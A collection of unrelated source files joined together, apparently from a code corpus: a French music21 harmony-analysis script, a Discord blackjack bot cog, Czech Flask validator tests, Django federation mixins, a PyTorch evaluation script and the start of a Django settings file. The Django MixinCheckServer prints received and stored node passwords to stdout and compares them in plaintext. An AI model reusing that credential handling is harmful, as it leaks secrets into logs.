''' Transforme chaque verticalite en objet Accord, calcule la concordance, la coherence et les concordances multiples, et stocke les resultats
sous forme de liste d'Accords"
'''
self.Normalisation()
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality, self.partiels, self.amplitudes, self.sig, self.normalisation, self.temperament,self.noteDeReferencePourLeTunning)
if verticality.bassTimespan!=None :
v.identifiant = verticality.bassTimespan.element.id
v.ListeHauteursAvecMultiplicite()
v.ListeConcordanceDesIntervallesDansAccord()
v.NombreDeNotes()
if v.nombreDeNotes>=2:
v.Concordance()
v.Dissonance()
if v.nombreDeNotes>=3:
v.Tension()
v.ConcordanceTotale()
self.grandeursHarmoniques.append(v)
def getAnnotatedStream(self, resultList = ['concordance']):
for gH in self.grandeursHarmoniques:
if gH.verticality.bassTimespan != None :
element = gH.verticality.bassTimespan.element
if element.isNote or element.isChord:
dataString = ""
if 'concordance' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(gH.concordance,2))
if 'concordanceOrdre3' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(10 * gH.concordanceOrdre3,2))
if 'concordanceTotale' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(10 * gH.concordanceTotale,2))
if 'dissonance' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str (round(gH.dissonance,2))
if 'tension' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str (round(gH.tension,2))
element.lyric = dataString
return tree.toStream.partwise(self.tree, self.stream)
def moyenneConcordance (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordance)
return np.mean(l)
def moyenneConcordanceTotale (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordanceTotale)
return np.mean(l)
def moyenneConcordanceOrdre3 (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordanceOrdre3)
return np.mean(l)
def offsetList (self):
'''Donne la liste de tous les offsets des verticalites'''
l = []
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality)
l.append(v.offset)
return l
def idList (self):
'''Donne la liste des identifiants des verticalites'''
l = []
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality)
l.append(v.id)
return l
def classementConc(self):
s = stream.Measure()
ts1 = meter.TimeSignature('C')
s.insert(0, ts1)
s.insert(0, clef.TrebleClef())
self.stream.lyrics = {}
self.getAnnotatedStream('concordance')
self.grandeursHarmoniques.sort(key=attrgetter('concordance'), reverse=True)
for gH in self.grandeursHarmoniques:
element = gH.verticality.bassTimespan.element
s.insert(-1, element)
s[0].addLyric('Concordance')
s.show()
del s[0].lyrics[1]
def classementConcTot(self):
s2 = stream.Measure()
ts1 = meter.TimeSignature('C')
s2.insert(0, ts1)
s2.insert(0, clef.TrebleClef())
self.stream.lyrics = {}
self.getAnnotatedStream(['concordanceTotale'])
self.grandeursHarmoniques.sort(key=attrgetter('concordanceTotale'), reverse=True)
for gH in self.grandeursHarmoniques:
element = gH.verticality.bassTimespan.element
s2.insert(-1, element)
s2[0].addLyric('ConcTot')
s2.show()
del s2[0].lyrics[1]
def classementDiss(self):
s1 = stream.Measure()
ts1 = meter.TimeSignature('C')
s1.insert(0, ts1)
s1.insert(0, clef.TrebleClef())
self.stream.lyrics = {}
self.getAnnotatedStream('dissonance')
self.grandeursHarmoniques.sort(key=attrgetter('dissonance'), reverse=False)
for gH in self.grandeursHarmoniques:
element = gH.verticality.bassTimespan.element
s1.insert(-1, element)
s1[0].addLyric('Dissonance')
s1.show()
del s1[0].lyrics[1]
def classementTens(self):
s3 = stream.Measure()
ts1 = meter.TimeSignature('C')
s3.insert(0, ts1)
s3.insert(0, clef.TrebleClef())
self.stream.lyrics = {}
self.getAnnotatedStream('tension')
self.grandeursHarmoniques.sort(key=attrgetter('tension'), reverse=False)
for gH in self.grandeursHarmoniques:
element = gH.verticality.bassTimespan.element
s3.insert(-1, element)
s3[0].addLyric('Tension')
s3.show()
del s3[0].lyrics[1]
#sorted(self.grandeursHarmoniques, key=attrgetter('concordance'))
#return tree.toStream.partwise(self.tree, self.stream)
class Accord(ListeAccords):
'''
Classe qui traite les verticalites en heritant de l'instrument et de la methode spectre de la classe ListeAccords,
et ayant comme attributs supplementaires les grandeurs lies a la concordance
Faiblesse pour l'instant : l'arbre de la classe mere est vide, un attribut 'verticality' vient le remplacer
'''
def __init__(self, verticality, partiels, amplitudes, sig, normalisation, temperament, noteDeReferencePourLeTunning):# verticality
self.partiels = partiels
self.amplitudes = amplitudes
self.sig = sig
self.temperament = temperament
self.noteDeReferencePourLeTunning = noteDeReferencePourLeTunning
self.normalisation = normalisation
self.listeHauteursAvecMultiplicite = []
self.listeConcordanceDesIntervallesDansAccord = []
self.verticality = verticality
self.concordance = 0
self.concordanceTotale = 0
self.concordanceOrdre3 = 0
self.dissonance = 0
self.tension = 0
self.identifiant = 0
self.nombreDeNotes = 0
def __repr__(self):
"""Affichage"""
return "Concordance: {0} \nConcordance d'ordre 3: {2} \nConcordance totale: {3}".format(self.concordance,self.concordanceOrdre3,self.concordanceTotale)
def ListeHauteursAvecMultiplicite(self):
""" Fonction qui donne la liste des pitches, comptes autant de fois qu'ils sont repetes a differentes voix"""
#self.listeHauteursAvecMultiplicite = list
for elt in self.verticality.startTimespans:
if elt.element.isChord:
for pitch in elt.element.pitches:
if elt.element.duration.quarterLength != 0:
self.listeHauteursAvecMultiplicite.append(pitch)
elif elt.element.duration.quarterLength != 0:
self.listeHauteursAvecMultiplicite.append(elt.element.pitch)
for elt in self.verticality.overlapTimespans:
if elt.element.isChord:
for pitch in elt.element.pitches:
self.listeHauteursAvecMultiplicite.append(pitch)
else:
self.listeHauteursAvecMultiplicite.append(elt.element.pitch)
def ListeConcordanceDesIntervallesDansAccord(self):
'''Cree la liste des concordances des intervalles qui constituent l'accord, et le fixe comme parametre, ceci afin d'eviter
les redondances dans les calculs de la concordance '''
for i, pitch1 in enumerate(self.listeHauteursAvecMultiplicite):
for j, pitch2 in enumerate(self.listeHauteursAvecMultiplicite):
if (i<j):
self.listeConcordanceDesIntervallesDansAccord.append(np.sum(self.spectre(self.frequenceAvecTemperament(pitch1))*self.spectre(self.frequenceAvecTemperament(pitch2))))
def NombreDeNotes(self):
if self.listeHauteursAvecMultiplicite != None:
self.nombreDeNotes = len(self.listeHauteursAvecMultiplicite)
def Concordance(self):
""" Normalisation logarithmique, de maniere a rendre egales les concordances des unissons de n notes"""
self.concordance = np.sum(self.listeConcordanceDesIntervallesDansAccord)
n = self.nombreDeNotes
self.concordance = self.concordance/(self.nombreDeNotes*(self.nombreDeNotes - 1)/2)
#self.concordance = np.log2(1 + self.concordance / (self.normalisation[0]*self.nombreDeNotes*(self.nombreDeNotes - 1)/2))
#self.concordance = np.log2(1 + self.concordance)/(np.log(1 + self.normalisation[0]*self.nombreDeNotes*(self.nombreDeNotes - 1)/2) / np.log(1 + self.normalisation[0]))
def ConcordanceTotale(self):
S = np.ones(16000)
for pitch in self.listeHauteursAvecMultiplicite:
S = S*self.spectre(self.frequenceAvecTemperament(pitch))
self.concordanceTotale = np.sum(S)
self.concordanceTotale = self.concordanceTotale**(2/self.nombreDeNotes)
def Dissonance(self):
for i, pitch1 in enumerate(self.listeHauteursAvecMultiplicite):
for j, pitch2 in enumerate(self.listeHauteursAvecMultiplicite):
if (i<j):
for k1 in range(1,len(self.partiels) + 1):
for k2 in range(1,len(self.partiels) + 1):
fmin = min(self.partiels[k2-1] * self.frequenceAvecTemperament(pitch2), self.partiels[k1-1] * self.frequenceAvecTemperament(pitch1))
fmax = max(self.partiels[k2-1] * self.frequenceAvecTemperament(pitch2), self.partiels[k1-1] * self.frequenceAvecTemperament(pitch1))
s=0.24/(0.021*fmin+19.)
self.dissonance = self.dissonance + (100 * self.amplitudes[k1-1] * self.amplitudes[k2-1]) * (np.exp(-3.5*s*(fmax-fmin))-np.exp(-5.75*s*(fmax-fmin)))
n = self.nombreDeNotes
self.dissonance = self.dissonance/(self.nombreDeNotes*(self.nombreDeNotes - 1)/2)
def Tension(self):
for i, pitch1 in enumerate(self.listeHauteursAvecMultiplicite):
for j, pitch2 in enumerate(self.listeHauteursAvecMultiplicite):
for l, pitch3 in enumerate(self.listeHauteursAvecMultiplicite):
if (i<j<l):
for k1 in range(1,len(self.partiels) + 1):
for k2 in range(1,len(self.partiels) + 1):
for k3 in range(1,len(self.partiels) + 1):
x = np.log2((self.partiels[k2-1] * self.frequenceAvecTemperament(pitch2)) / (self.partiels[k1-1] * self.frequenceAvecTemperament(pitch1)))
y = np.log2((self.partiels[k3-1] * self.frequenceAvecTemperament(pitch3)) / (self.partiels[k2-1] * self.frequenceAvecTemperament(pitch2)))
z = x + y
X = abs(x)
Y = abs(y)
Z = abs(z)
a = 0.6
self.tension = self.tension = self.tension + (self.amplitudes[k1-1] * self.amplitudes[k2-1] * self.amplitudes[k3-1]) * max(np.exp(-(12*(X-Y)/a)**2) , np.exp(-(12*(Y-Z)/a)**2) , np.exp(-(12*(X-Z)/a)**2))
n = self.nombreDeNotes
self.tension = self.tension/(self.nombreDeNotes*(self.nombreDeNotes - 1)*(self.nombreDeNotes - 2)/6)
def ConcordanceOrdre3(self):
for i, pitch1 in enumerate(self.listeHauteursAvecMultiplicite):
for j, pitch2 in enumerate(self.listeHauteursAvecMultiplicite):
for k, pitch3 in enumerate(self.listeHauteursAvecMultiplicite):
if (i<j<k):
self.concordanceOrdre3 = self.concordanceOrdre3 + np.sum(self.spectre(self.frequenceAvecTemperament(pitch1))*self.spectre(self.frequenceAvecTemperament(pitch2))*self.spectre(self.frequenceAvecTemperament(pitch3)))
self.concordanceOrdre3 = self.concordanceOrdre3**(2/3)
#self.concordanceOrdre3 = np.log2(1 + self.concordanceOrdre3 / (self.normalisation[1]*(self.nombreDeNotes*(self.nombreDeNotes - 1)*(self.nombreDeNotes - 2)/6)**(2/3)))
#self.concordanceOrdre3 = np.log2(1 + self.concordanceOrdre3)/(np.log(1 + self.normalisation[1] * (self.nombreDeNotes*(self.nombreDeNotes - 1)*(self.nombreDeNotes - 2)/6)**(2/3)) / np.log(1 + self.normalisation[1]))
score = converter.parse('/Users/manuel/Github/DescripteursHarmoniques/Exemples/SuiteAccords.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/AccordsMineur.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Majeur3et4notes.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Mineur3et4notes.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Tension.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/DispoMajeurMineur.musicxml')
l = ListeAccords(score)
l.ConcordanceCoherenceConcordanceOrdre3Liste()
l.classementConc()
#l.classementDiss()
#l.classementConcTot()
#l.classementTens()
|
<reponame>M2rsho/PyBot-v5
"""
Black Jack Command
~~~~~~~~~~~~~~~~~
Bruh moment
:copyright: (c) 2021-2021 M2rsho
:license: MIT, see LICENSE for more details.
"""
from discord.ext import commands
import discord
from discord.ext.commands.core import is_owner
import support
from discord.ext.commands import cooldown, BucketType
import random
from math import ceil
from cogs import checks
cards = list({
"A": 1,
"2": 2,
"3": 3,
"4": 4,
"5": 5,
"6": 6,
"7": 7,
"8": 8,
"9": 9,
"10": 10,
"J": 10,
"Q": 10,
"K": 10
}.items())
class createButtons(discord.ui.View):
def __init__(self, client, author, bet, language):
super().__init__(timeout=30)
self.client = client
self.author = author
self.message = None
self.bet = bet
self.dealerValue = 0
self.dealerDeck = None
self.dealerCards = []
self.userValue = 0
self.userDeck = None
self.userCards = []
self.lang = language
async def on_timeout(self) -> None:
self.hit.disabled = True
self.stand.disabled = True
self.resign.disabled = True
await self.message.edit(view=self)
return await super().on_timeout()
@discord.ui.button(label="Hit", style=discord.ButtonStyle.grey)
async def hit(self, button: discord.ui.Button, interaction: discord.Interaction):
if interaction.user.id != self.author.id:
await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
return
card = random.choice(cards)
self.userCards.append(card)
await self.updateCards(interaction)
@discord.ui.button(label="Stand", style=discord.ButtonStyle.grey)
async def stand(self, button: discord.ui.Button, interaction: discord.Interaction):
if interaction.user.id != self.author.id:
await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
return
while self.dealerValue <= 16:
self.dealerCards.append(random.choice(cards))
self.dealerDeck, self.dealerValue = await self.renderCards(self.dealerCards)
if self.dealerValue > 21:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.green))
await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
elif self.dealerValue == self.userValue:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["tie"],
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.yellow))
await support.globalData.addBalance(self.author, self.bet)
elif self.dealerValue > self.userValue:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["lost"].format(value=str(self.bet)),
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.red))
elif self.dealerValue < self.userValue:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.green))
await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
await self.on_timeout()
self.stop()
@discord.ui.button(label="Resign", style=discord.ButtonStyle.red)
async def resign(self, button: discord.ui.Button, interaction: discord.Interaction):
if interaction.user.id != self.author.id:
await interaction.response.send_message(self.lang["notYourMenu"], ephemeral=True)
return
await self.on_timeout()
self.stop()
async def updateCards(self, interaction):
self.userDeck, self.userValue = await self.renderCards(self.userCards)
if self.userValue > 21:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["lost"].format(value=str(self.bet)),
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.red))
await self.on_timeout()
self.stop()
elif self.dealerValue < 21 and len(self.userCards) >= 5:
await interaction.response.edit_message(
content=self.lang["commands"]["blackjack"]["won"].format(value=str(ceil(self.bet*(support.globalData.getSocialCreditSync(interaction.user)/1000)))),
embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerDeck),
dealerValue=str(self.dealerValue)
),
colour=support.colours.green))
await support.globalData.addBalance(self.author, self.bet+ceil(self.bet))
await self.on_timeout()
self.stop()
else:
await interaction.response.edit_message(embed=discord.Embed(
description=self.lang["commands"]["blackjack"]["menu"].format(
userDeck=str(self.userDeck),
userValue=str(self.userValue),
dealerCards=str(self.dealerCards[0][0]+', ?'),
dealerValue=str(self.dealerCards[0][1])
),
colour=support.colours.default))
async def renderCards(self, cards):
return ''.join(f"{card[0]}, " for card in cards)[:-2] + '.', sum([int(card[1]) for card in cards])
class blackjack(commands.Cog):
def __init__(self, client):
self.client = client
@checks.default()
@cooldown(1, support.cooldown, BucketType.user)
@commands.command(description=support.getDescription("en.json", "blackjack"), aliases=["bj"])
async def blackjack(self, ctx, bet):
current = await support.globalData.getBalance(ctx.message.author)
lang = support.getLanguageFileG(ctx.guild)
if bet.lower() == "max" or bet.lower() == "all":
bet = current
else:
bet = float(bet)
if current < bet:
raise ValueError(lang["commands"]["blackjack"]["notEnoughMoney"])
elif bet <= 0:
raise ValueError(lang["commands"]["blackjack"]["tooLowBet"])
await support.globalData.removebalance(ctx.message.author, bet)
view = createButtons(self.client, ctx.message.author, bet, lang)
dealerCards = random.choices(cards, k=2)
userCards = random.choices(cards, k=2)
view.dealerCards = dealerCards
view.userCards = userCards
view.userDeck, view.userValue = await view.renderCards(userCards)
view.dealerDeck, view.dealerValue = await view.renderCards(dealerCards)
message = await ctx.reply(mention_author=False, embed=discord.Embed(
description=lang["commands"]["blackjack"]["menu"].format(
userDeck=str(view.userDeck),
userValue=str(view.userValue),
dealerCards=str(view.dealerCards[0][0]+ ', ?'),
dealerValue=str(view.dealerCards[0][1])
),
colour=support.colours.default
), view=view)
view.message = message
def setup(bot):
bot.add_cog(blackjack(bot))
|
import pytest
from flask import url_for
from wtforms.validators import ValidationError
from registry.donor.models import DonorsOverview
from registry.utils import NumericValidator
from .helpers import FakeForm, login
class TestNumericValidator:
def test_length_validation(self):
validator = NumericValidator(5)
form = FakeForm()
form.field.data = "12345"
validator(form, form.field)
form.field.data = "11111111111"
with pytest.raises(ValidationError, match="^Pole musí mít právě 5 znaků$"):
validator(form, form.field)
form.field.data = "0"
with pytest.raises(ValidationError, match="^Pole musí mít právě 5 znaků$"):
validator(form, form.field)
def test_numeric_validation(self):
validator = NumericValidator(5)
form = FakeForm()
form.field.data = "12345"
validator(form, form.field)
form.field.data = "1234a"
with pytest.raises(
ValidationError, match="^Pole musí obsahovat pouze číslice$"
):
validator(form, form.field)
form.field.data = "0x123"
with pytest.raises(
ValidationError, match="^Pole musí obsahovat pouze číslice$"
):
validator(form, form.field)
def test_messages(self):
validator = NumericValidator(5, msg_numeric="numeric", msg_length="length")
form = FakeForm()
form.field.data = "abcde"
with pytest.raises(ValidationError, match="^numeric$"):
validator(form, form.field)
form.field.data = "1"
with pytest.raises(ValidationError, match="^length$"):
validator(form, form.field)
def test_plural(self):
form = FakeForm()
form.field.data = "11111111111"
validator = NumericValidator(5)
with pytest.raises(ValidationError, match="^Pole musí mít právě 5 znaků$"):
validator(form, form.field)
validator = NumericValidator(3)
with pytest.raises(ValidationError, match="^Pole musí mít právě 3 znaky$"):
validator(form, form.field)
validator = NumericValidator(1)
with pytest.raises(ValidationError, match="^Pole musí mít právě 1 znak$"):
validator(form, form.field)
class TestCapitalizer:
@pytest.mark.parametrize(
("input", "expected"),
(
("karlov", "karlov"),
("Karlov", "Karlov"),
("KARLOV", "Karlov"),
("Velké KARLOVICE", "Velké Karlovice"),
("velké karlovice", "velké karlovice"),
("VELKÉ karlovice", "Velké karlovice"),
("VELKÉ KARLOVICE", "Velké Karlovice"),
("a b c d", "a b c d"),
("A B C D", "A B C D"),
("a B c D", "a B c D"),
("U LÍPY", "U Lípy"),
("u lípy", "u lípy"),
("U Lípy", "U Lípy"),
("Frýdlant nad Ostravicí", "Frýdlant nad Ostravicí"),
("FRÝDLANT NAD OSTRAVICÍ", "Frýdlant Nad Ostravicí"),
),
)
def test_capitalize(self, testapp, input, expected):
capitalize = testapp.app.jinja_env.filters["capitalize"]
output = capitalize(input)
assert output == expected
def test_capitalize_in_templates(self, user, testapp, db):
rodne_cislo = "1234567890"
do = DonorsOverview(
rodne_cislo=rodne_cislo,
first_name="KAREL",
last_name="VOMÁČKA",
address="LIPOVÁ 33",
city="OSTRAVA",
postal_code="71600",
kod_pojistovny="213",
donation_count_fm=50,
donation_count_fm_bubenik=50,
donation_count_trinec=50,
donation_count_mp=50,
donation_count_manual=50,
donation_count_total=250,
awarded_medal_br=False,
awarded_medal_st=False,
awarded_medal_zl=False,
awarded_medal_kr3=False,
awarded_medal_kr2=False,
awarded_medal_kr1=False,
awarded_medal_plk=False,
)
db.session.add(do)
db.session.commit()
login(user, testapp)
pages = (
("donor.detail", {"rc": rodne_cislo}),
("donor.award_prep", {"medal_slug": "br"}),
("donor.render_award_document", {"rc": rodne_cislo, "medal_slug": "br"}),
)
for page, params in pages:
res = testapp.get(url_for(page, **params))
assert "KAREL" not in res
assert "VOMÁČKA" not in res
assert "Karel" in res
assert "Vomáčka" in res
if "award_document" not in page:
assert "LIPOVÁ 33" not in res
assert "OSTRAVA" not in res
assert "Lipová 33" in res
assert "Ostrava" in res
|
from .. import models
import aiohttp
import asyncio
from django.conf import settings
from django.urls import reverse_lazy
from urllib.parse import urlparse
import uuid
import base64
from django.contrib.auth.models import User
class MixinContext(object):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.user.is_authenticated:
# Auth = models.Author.objects.filter(localuser=self.request.user)
# if Auth:
context['ActiveUser'] = self.request.user.author
return context
class MixinIndex(object):
async def refresh_feed(self, session, active_user, url):
async with session.get(url) as req:
data = await req.json()
for item in data:
try:
itemId = int(item["id"])
if models.Post.objects.filter(correlationId=itemId):
continue
title = item['type']
description = "about Github"
content = "No Content"
timeAt = item["created_at"]
if title == "PushEvent":
description = f"I just pushed to my repository {item['repo']['name']}"
elif title == "ForkEvent":
description = f"I just forked {item['repo']['name']}"
elif title == "CreateEvent":
description = f"I just created {item['repo']['name']}"
title = "about Github"
post = models.Post(author=active_user,
origin=settings.SITE_URL,
source=settings.SITE_URL,
title=title,
description=description,
content=content,
contentType="text/markdown",
published=timeAt,
correlationId = itemId,
unlisted=False
)
post.save()
post.source = f"{settings.SITE_URL}{reverse_lazy('api-post', kwargs={'pk': post.id})}"
post.origin = post.source
post.save()
except Exception as e:
print(e)
async def refresh_async(self, active_user):
async with aiohttp.ClientSession() as session:
outstanding = []
if active_user:
outstanding.append(self.refresh_feed(session, active_user, active_user.feed))
for node in models.Node.objects.all():
# import pdb; pdb.set_trace()
outstanding.append(node.pull(active_user, session))
if outstanding:
await asyncio.wait(outstanding)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# get author image
if self.request.user.is_authenticated:
author = self.request.user.author
context['ActiveUser'] = author
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self.refresh_async(author))
loop.close()
context['Posts'] = author.get_all_posts()[:100]
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self.refresh_async(None))
loop.close()
context['Posts'] = self.public_user()
return context
# this is a build in mixin called UserPassesTestMixin and test_func
class DenyAcess(object):
def deny(self):
pass
async def fetchUser(url, node):
async with aiohttp.ClientSession() as session:
return await node.fetchRemoteAuthor(url, session, True)
async def refreshUser(author, node):
async with aiohttp.ClientSession() as session:
return await node.refreshRemoteAuthor(author, session, True)
class MixinCreateAuthor(object):
def createAuthor(self,author,requestType):
author_url = author["url"]
path = urlparse(author_url).path
author_id = None
if path:
author_id = path.split('/')[-1]
# may need to readd this assumtion, or pull data from serve before checking this
# remoteAuthor = models.Author(id=uuid.UUID(author_id),github=github,displayName=displayName,host=host)
if models.Author.objects.filter(pk=author_id).exists():
remoteAuthor = models.Author.objects.get(pk=author_id)
node = generic_find_node(author_url)
if node:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
remoteAuthor = loop.run_until_complete(refreshUser(remoteAuthor, node))
loop.close()
else:
node = generic_find_node(author_url)
if not node:
raise Exception("Node not found")
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
remoteAuthor = loop.run_until_complete(fetchUser(author_url, node))
loop.close()
return remoteAuthor
class MixinCheckServer(object):
def checkserver(self, server):
if settings.LIMIT_NODE_TO_NODE_CONNECTIONS:
if not server:
raise Exception("No Authorization Header")
server = server.split(' ')
basic = server[0]
auth = server[-1]
username, _, password = base64.b64decode(auth).decode("utf-8").rpartition(':')
print(username)
password = password.strip()
print(f"{password}:{len(password)}")
node = generic_find_node(username)
if node:
print("Found node")
print(node)
print(f"{node.password}:{len(node.password)}")
if node.password == password:
return True
else:
return False
print("No Node")
return False
# if User.objects.filter(username=username).exists():
# user = User.objects.get(username=username)
# if user.check_password(password):
# return True
# else:
# return False
else:
return True
def generic_find_node(url) -> models.Node:
proto, host = urlparse(url)[0:2]
host = f"{proto}://{host}"
for node in models.Node.objects.all():
print(node.host)
print(url)
if node.host == host:
return node |
<filename>test_CCAI.py<gh_stars>0
from comet_ml import Experiment
import argparse
import os
import os.path as osp
import pprint
import random
import warnings
from pathlib import Path
import numpy as np
import yaml
import torch
from torch import nn
from advent.model.deeplabv2 import get_deeplab_v2
from test_save_scripts import eval_best
from advent.utils.datasets import get_loader
from advent.utils.tools import (
load_opts,
set_mode,
# avg_duration,
flatten_opts,
print_opts
)
# from time import time
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore")
def get_arguments():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description="Code for domain adaptation (DA) training")
parser.add_argument('--cfg', type=str, default="shared/advent.yml",
help='optional config file', )
parser.add_argument("--random-train", action="store_true",
help="not fixing random seed.")
parser.add_argument("--viz-every-iter", type=int, default=None,
help="visualize results.")
parser.add_argument("--exp-suffix", type=str, default=None,
help="optional experiment suffix")
parser.add_argument(
"-d",
"--data",
help="yaml file for the data",
default="shared/config.yml",
)
parser.add_argument(
"-n",
"--no_check",
action="store_true",
default=False,
help="Prevent sample existence checking for faster dev",
)
return parser.parse_args()
def main():
# --------------------------
# ----- Load Options -----
# --------------------------
args = get_arguments()
print('Called with args:')
print(args)
assert args.cfg is not None, 'Missing cfg file'
root = Path(__file__).parent.resolve()
cfg = load_opts(path=root / args.cfg, default="shared/config.yml")
cfg = set_mode("train", cfg)
flats = flatten_opts(cfg)
print_opts(flats)
cfg.model.is_train = False
cfg.data.loaders.batch_size = 1
comet_exp = Experiment(workspace=cfg.workspace, project_name=cfg.project_name)
flats = flatten_opts(cfg)
comet_exp.log_parameters(flats)
# auto-generate exp name if not specified
if cfg.EXP_NAME == '':
cfg.EXP_NAME = f'{cfg.SOURCE}2{cfg.TARGET}_{cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}'
if args.exp_suffix:
cfg.EXP_NAME += f'_{args.exp_suffix}'
# auto-generate snapshot path if not specified
if cfg.TRAIN.SNAPSHOT_DIR == '':
cfg.TRAIN.SNAPSHOT_DIR = osp.join(cfg.EXP_ROOT_SNAPSHOT, cfg.EXP_NAME)
os.makedirs(cfg.TRAIN.SNAPSHOT_DIR, exist_ok=True)
print('Using config:')
pprint.pprint(cfg)
# INIT
_init_fn = None
if not args.random_train:
torch.manual_seed(cfg.TRAIN.RANDOM_SEED)
torch.cuda.manual_seed(cfg.TRAIN.RANDOM_SEED)
np.random.seed(cfg.TRAIN.RANDOM_SEED)
random.seed(cfg.TRAIN.RANDOM_SEED)
def _init_fn(worker_id):
np.random.seed(cfg.TRAIN.RANDOM_SEED + worker_id)
if os.environ.get('ADVENT_DRY_RUN', '0') == '1':
return
# LOAD SEGMENTATION NET
assert osp.exists(cfg.TRAIN.RESTORE_FROM), f'Missing init model {cfg.TRAIN.RESTORE_FROM}'
if cfg.TRAIN.MODEL == 'DeepLabv2':
model = get_deeplab_v2(num_classes=cfg.NUM_CLASSES, multi_level=cfg.TRAIN.MULTI_LEVEL)
saved_state_dict = torch.load(cfg.TRAIN.RESTORE_FROM)
if 'DeepLab_resnet_pretrained_imagenet' in cfg.TRAIN.RESTORE_FROM:
new_params = model.state_dict().copy()
for i in saved_state_dict:
i_parts = i.split('.')
if not i_parts[1] == 'layer5':
new_params['.'.join(i_parts[1:])] = saved_state_dict[i]
model.load_state_dict(new_params)
else:
model.load_state_dict(saved_state_dict)
else:
raise NotImplementedError(f"Not yet supported {cfg.TRAIN.MODEL}")
print('Model loaded')
#source_loader = get_loader(cfg, real=False, no_check=args.no_check)
target_loader = get_loader(cfg, real=True, no_check=args.no_check)
with open(osp.join(cfg.TRAIN.SNAPSHOT_DIR, 'train_cfg.yml'), 'w') as yaml_file:
yaml.dump(cfg, yaml_file, default_flow_style=False)
device = cfg.GPU_ID
eval_best(cfg, model, device, target_loader, comet_exp, True)
if __name__ == '__main__':
main() |
<filename>app/server/server/settings.py
"""
Django settings for server project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import random
import string
from pathlib import Path
import json
import os
from module.manager.internal_database_concurrency_manager import InternalDatabaseConcurrencyManager
from module.specification.System_config import SystemConfig
config = None
# Load Config File
try:
with open('server/config.json', 'r') as f:
config = json.load(f)
except Exception as e:
print("Config data is not setting, please back to `bin` directory and run command `perl install.pl install` ")
exit(0)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# 해당 어플리케이션은 사용작 직접 NAS에 설치하게 되므로 50자 랜덤으로 설정한다.
chars = ''.join([string.ascii_letters, string.digits, string.punctuation]). \
replace('\'', '').replace('"', '').replace('\\', '')
SECRET_KEY = ''.join([random.SystemRandom().choice(chars) for i in range(50)])
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'corsheaders'
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
